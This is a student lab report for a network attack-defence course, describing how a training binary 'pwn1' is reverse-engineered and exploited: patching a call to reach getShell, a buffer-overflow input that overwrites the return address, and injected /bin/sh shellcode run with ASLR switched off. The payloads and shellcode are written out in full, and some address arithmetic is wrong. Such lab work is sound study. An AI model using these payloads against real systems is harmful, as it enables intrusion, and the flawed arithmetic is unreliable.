2019-2020-2 网络对抗技术 20175236 Exp1 PC平台逆向破解

逆向及Bof基础实践说明


 实践目标
本次实践的对象是一个名为pwn1的linux可执行文件。

该程序正常执行流程是:main调用foo函数,foo函数会简单回显任何用户输入的字符串。

该程序同时包含另一个代码片段,getShell,会返回一个可用Shell。正常情况下这个代码是不会被运行的。我们实践的目标就是想办法运行这个代码片段。我们将学习两种方法运行这个代码片段,然后学习如何注入运行任何Shellcode。

  • 三个实践内容如下:
    • 手工修改可执行文件,改变程序执行流程,直接跳转到getShell函数。
    • 利用foo函数的Bof漏洞,构造一个攻击输入字符串,覆盖返回地址,触发getShell函数。
    • 注入一个自己制作的shellcode并运行这段shellcode。
  • 这几种思路,基本代表现实情况中的攻击目标:
    • 运行原本不可访问的代码片段
    • 强行修改程序执行流
    • 以及注入运行任意代码。

基础知识

  1. NOP:NOP指令即“空指令”。执行到NOP指令时,CPU什么也不做,仅仅当做一个指令执行过去并继续执行NOP后面的一条指令。(机器码:90)
  2. JNE:条件转移指令,如果不相等则跳转。(机器码:75)
  3. JE:条件转移指令,如果相等则跳转。(机器码:74)
  4. JMP:无条件转移指令。段内直接短转Jmp short(机器码:EB) 段内直接近转移Jmp near(机器码:E9) 段内间接转移 Jmp word(机器码:FF) 段间直接(远)转移Jmp far(机器码:EA)
  5. CMP:比较指令,功能相当于减法指令,只是对操作数之间运算比较,不保存结果。cmp指令执行后,将对标志寄存器产生影响。其他相关指令通过识别这些被影响的标志寄存器位来得知比较结果
  6. objdump -d:从objfile中反汇编那些特定指令机器码的section。
  7. perl -e:后面紧跟单引号括起来的字符串,表示在命令行要执行的命令。
  8. ps -ef:显示所有进程,并显示每个进程的UID,PPIP,C与STIME栏位。
  9. |:管道,将前者的输出作为后者的输入。
  10. >:输入输出重定向符,将前者输出的内容输入到后者中。
  11. vim16进制显示切换:
    将显示模式切换为16进制模式:%!xxd
    
    将16进制切换回ASCII码模式:%!xxd -r

 

 

 

 



任务

1.实验内容

1.1直接修改程序机器指令,改变程序执行流程
1.2通过构造输入参数,造成BOF攻击,改变程序执行流
1.3注入Shellcode并执行

2.需要描述的内容

2.1掌握NOP, JNE, JE, JMP, CMP汇编指令的机器码
2.2掌握反汇编与十六进制编程器
2.3能正确修改机器指令改变程序执行流程
2.4能正确构造payload进行bof攻击

3.用自己的话回答以下问题:

3.1实验收获与感想
3.2什么是漏洞?漏洞有什么危害?

1.1直接修改程序机器指令,改变程序执行流程

知识要求:Call指令,EIP寄存器,指令跳转的偏移计算,补码,反汇编指令objdump,十六进制编辑工具
学习目标:理解可执行文件与机器指令
进阶:掌握ELF文件格式,掌握动态技术

  • 使用objdump -d pwn1 | more将pwn1反汇编,得到以下代码

 

  • 输入/getShell快速锁定到对应函数

 

 

 

  • 在more处长按enter键下拉后可以看出80484b5: e8 d7 ff ff ff call 8048491 <foo>这条汇编指令,在main函数中调用位于地址8048491处的foo函数
  • e8表示“call”,即跳转。
  • getShell函数的起始地址:804847d
  • 执行跳转指令时EIP寄存器中的值:80484ba
  • 求差得FFFF FFC3,所以call指令对应的机器指令应改为e8 c3 ff ff ff

 

修改具体如下:

  • vi pwn2进入命令模式
  • 输入:%!xxd将显示模式切换为十六进制
  • /e8 d7查找要修改的内容
  • 进入插入模式,修改d7为c3

 

 

 

  • 输入:%!xxd -r显示为ASCII码

  • 使用:wq!保存并退出
  • 反汇编查看修改后的代码,发现call指令正确调用getShell:

 

 



 1.2通过构造输入参数,造成BOF攻击,改变程序执行流

 

通过构造输入参数,造成BOF攻击,改变程序执行流

知识要求:堆栈结构,返回地址 学习目标:理解攻击缓冲区的结果,掌握返回地址的获取 进阶:掌握ELF文件格式,掌握动态技术

  • objdump -d pwn1 | more命令反汇编

 

 

 

  • 该可执行文件正常运行是调用函数foo,这个函数有Buffer overflow漏洞。
  • 由上图,读入字符串时,系统只预留了28字节(-0x1c)的缓冲区,超出部分会造成溢出,我们的目标是覆盖返回地址。
  • 上面的call调用foo,同时在堆栈上压上返回地址值:80484ba

尝试发现,当输入为以下字符时已经发生段错误,产生溢出,我们使用gdb进行调试:

 

 

由此可得eip的值为ASCII的5,即输入字符串的“5”的部分发生溢出,尝试将5的部分换成12345678进一步确认:

 

 

 

由此 1234 那四个数覆盖堆栈上的返回地址,进而CPU会尝试运行这个位置的代码。那只要把这四个字符替换为 getShell 的内存地址,输给pwn1,pwn1就会运行getShell。

  • 反汇编查看getshell的内存地址:

由此可知应输入

11111111222222223333333344444444\x7d\x84\x04\x08

 

  • 使用perl命令构造文件
    perl -e 'print "11111111222222223333333344444444\x7d\x84\x04\x08\x0a"' > input
  • 使用十六进制查看指令xxd查看input文件。\0a表示换行

  • 查看结果

    (cat input; cat ) | ./pwn1

     

     

     



1.3注入Shellcode并执行 

 

  • Shellcode就是一段机器指令(code)
    • 通常这段机器指令的目的是为获取一个交互式的shell(像linux的shell或类似windows下的cmd.exe),所以这段机器指令被称为shellcode。
    • 在实际的应用中,凡是用来注入的机器指令段都通称为shellcode,像添加一个用户、运行一条指令。
  • 首先使用apt-get install execstack安装execstack

 

 

  • 修改设置,输入
    execstack -q pwn1 //查询文件的堆栈是否可执行
    more /proc/sys/kernel/randomize_va_space

    然后sudo -s进入root权限

    echo "0" > /proc/sys/kernel/randomize_va_space //关闭地址随机化
    more /proc/sys/kernel/randomize_va_space

     

 

  • 构造要注入的payload:
perl -e 'print "\x4\x3\x2\x1\x90\x90\x90\x90\x90\x90\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80\x90\x00"' > input_shellcode
  • 上面最后的\x4\x3\x2\x1将覆盖到堆栈上的返回地址的位置。我们得把它改为这段shellcode的地址。
  • 注意:最后一个字符不能是\x0a

 

 

 

确定\x4\x3\x2\x1到底该填什么:

  • 在第一个终端用(cat input_shellcode;cat) | ./pwn1注入攻击,回车后保持这个终端不动,打开另一个终端
  • 另一个终端
    • ps -df |grep pwn1查看 其进程号为3706

 

 

  • gdb调试进程
    • 启动gdb,调试此进程

      attach 3706(进程号)

      通过disassemble foo来查看注入buf的内存地址


      使用break *0x080484ae设置断点,在此终端输入c,在另一终端输入回车,使其继续执行。

      再返回调试终端,使用info r esp查找地址。
      使用x/16x 0xffffd1fc查看其存放内容,看到了9080cd0b,就是返回地址的位置。

      shellcode地址:0xffffd2ec+0x00000004=0xffffd200


  • 回到第一个终端
    • 输入命令
      perl -e 'print "A" x 32;print "\x00\xd2\xff\xff\x90\x90\x90\x90\x90\x90\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80\x90\x00\xd3\xff\xff\x00"' > input_shellcode
    • 再用(cat input_shellcode;cat) | ./pwn1查看结果

 

 

 



 

2.1掌握NOP, JNE, JE, JMP, CMP汇编指令的机器码

(参考https://blog.csdn.net/liqiang981/article/details/51895009)
NOP:0x90
JNE:0x75
JE:0x74
JMP:
段内短跳转Jump Short:0xEB
段内近跳转Jump Near :0xE9
段间远转移Jmp Far :0xEA
段内间接跳转Jmp Word:0xFF
CMP:0x39

 



 2.2掌握反汇编与十六进制编程器

反汇编指令为objdump -d <文件名>
十六进制指令为`perl -e 'print "字符/字符串"' > <文件名>

 



 2.3能正确修改机器指令改变程序执行流程&2.4能正确构造payload进行bof攻击

见1.1&1.3

 



 3.1实验收获与感想

本次实验让我复习了Linux的部分指令、汇编的部分知识、gdb调试、vi的使用、反汇编与十六进制编辑,学习了BOF的原理和防御等知识。

这次实验让我深刻感受到BOF漏洞带来的危害,更重要的是,让我意识到漏洞往往是在不经意间产生,而又很容易被有心之人利用。希望未来在网络攻防技术这门课中学到更多的攻击技术,在攻击中让我们学会更好地防御漏洞。

在这次实验中,复习了Linux的部分指令、汇编的部分知识、gdb调试、vi的使用、反汇编与十六进制编辑,学习了BOF的原理和防御等知识。

比如熟悉了NOP, JNE, JE, JMP, CMP汇编指令的机器码

汇编指令机器码
NOP 90
JNE 75
JE 74
JMP eb
CMP 39

当然这次实验过程中也遇到了一些问题,如下所示:

  • 问题1:/e8 d7找不到

 

 

  • 问题1解决方案:权限不够,需要赋予root权限

  • 问题2:无法定位软件包

 

 

  • 问题2解决方案:

    在etc/apt 的sources.list 添加镜像源   

    deb http://http.kali.org/kali kali-rolling main non-free contrib 或

    deb http://mirrors.ustc.edu.cn/kali kali-rolling main non-free contrib

    然后sudo apt-get update即可

     

 

总而言之,这次实验虽然是个简单的训练,但是却让我深刻感受到BOF漏洞带来的危害,更重要的是,让我意识到漏洞往往是在不经意间产生,而又很容易被有心之人利用。希望未来在网络攻防技术这门课中学到更多的攻击技术,在攻击中让我们学会更好地防御漏洞。

3.2什么是漏洞?漏洞有什么危害?

我认为漏洞就是正常功能的硬件、软件或者策略中的缺陷。漏洞可能会被不怀好意的人利用而用于破坏计算机安全,或达到其他对程序设计者和正常使用者不利的目的。

 

posted on 2020-03-20 17:55  20175236温丰帆  阅读(170)  评论(0编辑  收藏  举报